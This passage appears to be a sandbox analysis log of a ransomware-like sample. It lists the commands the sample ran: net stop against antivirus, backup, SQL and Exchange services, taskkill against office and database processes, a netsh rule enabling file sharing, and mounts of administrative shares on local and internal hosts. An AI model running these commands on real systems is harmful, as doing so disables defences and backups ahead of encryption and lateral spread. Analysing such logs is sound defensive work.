C:\Windows\system32\net1 stop “Sophos Clean Service” /y
3⤵
PID:5052

C:\Windows\SYSTEM32\net.exe
"net.exe" stop IISAdmin /y
2⤵
PID:5104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
3⤵
PID:4648

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
2⤵
PID:4496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
3⤵
PID:4936

C:\Windows\SYSTEM32\net.exe
"net.exe" stop TrueKeyServiceHelper /y
2⤵
PID:2112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
3⤵
PID:4908

C:\Windows\SYSTEM32\net.exe
"net.exe" stop TmCCSF /y
2⤵
PID:4620

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
3⤵
PID:5036

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SMTPSvc /y
2⤵
PID:4352

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
3⤵
PID:5108

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
2⤵
PID:4944

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3168

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
3⤵
PID:4184

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSExchangeES /y
2⤵
PID:4316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
3⤵
PID:4544

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLBrowser /y
2⤵
PID:5060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
3⤵
PID:4176

C:\Windows\SYSTEM32\net.exe
"net.exe" stop WRSVC /y
2⤵
PID:3872

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
3⤵
PID:3912

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos Agent” /y
2⤵
PID:2388

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
3⤵
PID:4148

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:4568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
3⤵
PID:4408

C:\Windows\SYSTEM32\net.exe
"net.exe" stop tmlisten /y
2⤵
PID:4732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
3⤵
PID:4560

C:\Windows\SYSTEM32\net.exe
"net.exe" stop EraserSvc11710 /y
2⤵
PID:4420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
3⤵
PID:5000

C:\Windows\SYSTEM32\net.exe
"net.exe" stop mssql$vim_sqlexp /y
2⤵
PID:4444

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
3⤵
PID:4372

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
2⤵
PID:4536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
3⤵
PID:5024

C:\Windows\SYSTEM32\net.exe
"net.exe" stop msftesql$PROD /y
2⤵
PID:5096

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
3⤵
PID:4504

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLSafeOLRService /y
2⤵
PID:4556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
3⤵
PID:4928

C:\Windows\SYSTEM32\net.exe
"net.exe" stop vapiendpoint /y
2⤵
PID:4972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
3⤵
PID:4180

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ReportServer$TPSAMA /y
2⤵
PID:4832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
3⤵
PID:4884

C:\Windows\SYSTEM32\net.exe
"net.exe" stop TrueKey /y
2⤵
PID:4996

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
3⤵
PID:2024

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SstpSvc /y
2⤵
PID:1972

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
3⤵
PID:4340

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
2⤵
PID:4592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
3⤵
PID:4916

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Zoolz 2 Service” /y
2⤵
PID:2984

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
3⤵
PID:2460

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSExchangeMTA /y
2⤵
PID:5080

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
3⤵
PID:4908

C:\Windows\SYSTEM32\net.exe
"net.exe" stop SQLSERVERAGENT /y
2⤵
PID:3488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
3⤵
PID:4992

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSOLAP$TPS /y
2⤵
PID:4644

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
3⤵
PID:4384

C:\Windows\SYSTEM32\net.exe
"net.exe" stop audioendpointbuilder /y
2⤵
PID:4564

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
3⤵
PID:4100

C:\Windows\SYSTEM32\net.exe
"net.exe" stop TrueKeyScheduler /y
2⤵
PID:4896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
3⤵
PID:3936

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos Device Control Service” /y
2⤵
PID:4172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
3⤵
PID:540

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “aphidmonitorservice” /y
2⤵
PID:5032

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
3⤵
PID:4852

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$SBSMONITORING /
2⤵
PID:2892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
3⤵
PID:3912

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
2⤵
PID:4932

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
3⤵
PID:4692

C:\Windows\SYSTEM32\net.exe
"net.exe" stop msexchangeadtopology /y
2⤵
PID:4552

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4408

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
3⤵
PID:4120

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$SBSMONITORING /y
2⤵
PID:4532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
3⤵
PID:3520

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Symantec System Recovery” /y
2⤵
PID:2144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
3⤵
PID:1052

C:\Windows\SYSTEM32\net.exe
"net.exe" stop AVP /y
2⤵
PID:616

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4524

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AVP /y
3⤵
PID:4712

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
2⤵
PID:4736

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
3⤵
PID:3900

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos MCS Agent” /y
2⤵
PID:1832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
3⤵
PID:5040

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:4772

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3⤵
PID:184

C:\Windows\SYSTEM32\net.exe
"net.exe" stop UI0Detect /y
2⤵
PID:4684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
3⤵
PID:4860

C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:4912

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSExchangeSA /y
2⤵
PID:4980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
3⤵
PID:4224

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$SHAREPOINT /y
2⤵
PID:4600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
3⤵
PID:4328

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
2⤵
PID:4636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
3⤵
PID:5076

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
2⤵
PID:4812

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
3⤵
PID:4456

C:\Windows\SYSTEM32\net.exe
"net.exe" stop DCAgent /y
2⤵
PID:2864

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
3⤵
PID:4724

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
2⤵
PID:4492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
3⤵
PID:4440

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ReportServer$TPS /y
2⤵
PID:4676

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4656

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
3⤵
PID:1968

C:\Windows\SYSTEM32\net.exe
"net.exe" stop msexchangeimap4 /y
2⤵
PID:1160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
3⤵
PID:4308

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
2⤵
PID:1712

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4376

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
3⤵
PID:2724

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
2⤵
PID:512

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4352

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
3⤵
PID:5080

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos MCS Client” /y
2⤵
PID:4568

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
3⤵
PID:4832

C:\Windows\SYSTEM32\net.exe
"net.exe" stop ARSM /y
2⤵
PID:3488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ARSM /y
3⤵
PID:1348

C:\Windows\SYSTEM32\net.exe
"net.exe" stop W3Svc /y
2⤵
PID:4796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
3⤵
PID:4348

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
2⤵
PID:4228

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
3⤵
PID:1236

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSExchangeSRS /y
2⤵
PID:4452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
3⤵
PID:4576

C:\Windows\SYSTEM32\net.exe
"net.exe" stop unistoresvc_1af40a /y
2⤵
PID:4632

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
3⤵
PID:4560

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos Health Service” /y
2⤵
PID:4460

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
3⤵
PID:4784

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos Message Router” /y
2⤵
PID:4940

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
3⤵
PID:4588

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:4012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
3⤵
PID:4164

C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:4612

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\Users
2⤵
PID:3484

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4364

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\A$
2⤵
PID:4728

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\B$
2⤵
PID:5012

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\C$
2⤵
PID:4808

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\D$
2⤵
PID:4836

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\E$
2⤵
PID:4912

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4772

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\F$
2⤵
PID:4916

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\G$
2⤵
PID:4456

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos Safestore Service” /y
2⤵
PID:4720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
3⤵
PID:4856

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:4544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
3⤵
PID:4488

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
2⤵
PID:1048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
3⤵
PID:4656

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos System Protection Service” /y
2⤵
PID:4360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
3⤵
PID:4636

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\H$
2⤵
PID:4284

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
2⤵
PID:540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
3⤵
PID:4944

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
2⤵
PID:4832

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
3⤵
PID:4444

C:\Windows\SYSTEM32\net.exe
"net.exe" stop “Sophos Web Control Service” /y
2⤵
PID:4628

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
3⤵
PID:4128

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:5060

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
3⤵
PID:3172

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$PROD /y
2⤵
PID:4680

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
3⤵
PID:3860

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\I$
2⤵
PID:4428

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4796

C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:4200

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
3⤵
PID:2892

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:4716

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
3⤵
PID:1052

C:\Windows\SYSTEM32\net.exe
"net.exe" stop MSSQL$PROFXENGAGEMENT /y
2⤵
PID:3808

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
3⤵
PID:4132

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\J$
2⤵
PID:4408

C:\Windows\SYSTEM32\net.exe
"net.exe" stop Antivirus /y
2⤵
PID:3412

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
3⤵
PID:4928

C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:4632

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
3⤵
PID:1248

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4848

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1832

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\K$
2⤵
PID:4252

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4960

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\L$
2⤵
PID:4280

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
PID:1092

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
PID:1736

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4836

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\M$
2⤵
PID:4776

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4272

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
PID:4240

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\N$
2⤵
PID:4440

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5116

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4160

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\O$
2⤵
PID:4812

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4636

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
PID:2724

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.11\Users
2⤵
PID:3980

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1712

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
PID:4308

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\P$
2⤵
PID:2984

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
PID:4316

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\Q$
2⤵
PID:4344

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2932

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.11\A$
2⤵
PID:5064

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2144

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\R$
2⤵
PID:4628

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
PID:4320

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.11\B$
2⤵
PID:1836

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
PID:4552

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
PID:4952

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\S$
2⤵
PID:4012

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4952

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.11\C$
2⤵
PID:4632

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4752

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.11\D$
2⤵
PID:4524

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:184

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\T$
2⤵
PID:2732

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:4324

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5012

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.11\E$
2⤵
PID:3868

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
PID:2300

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\U$
2⤵
PID:1524

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4912

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
PID:4236

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.11\F$
2⤵
PID:4768

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\Users
2⤵
PID:3616

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4648

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\A$
2⤵
PID:4724

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\G$
2⤵
PID:620

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\V$
2⤵
PID:1088

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4812

C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5080

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2724

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\127.0.0.1\W$
2⤵
PID:4168

C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.10.0.18\H$
2⤵
PID:4284

C:\Windows\SYSTEM32\net.exe
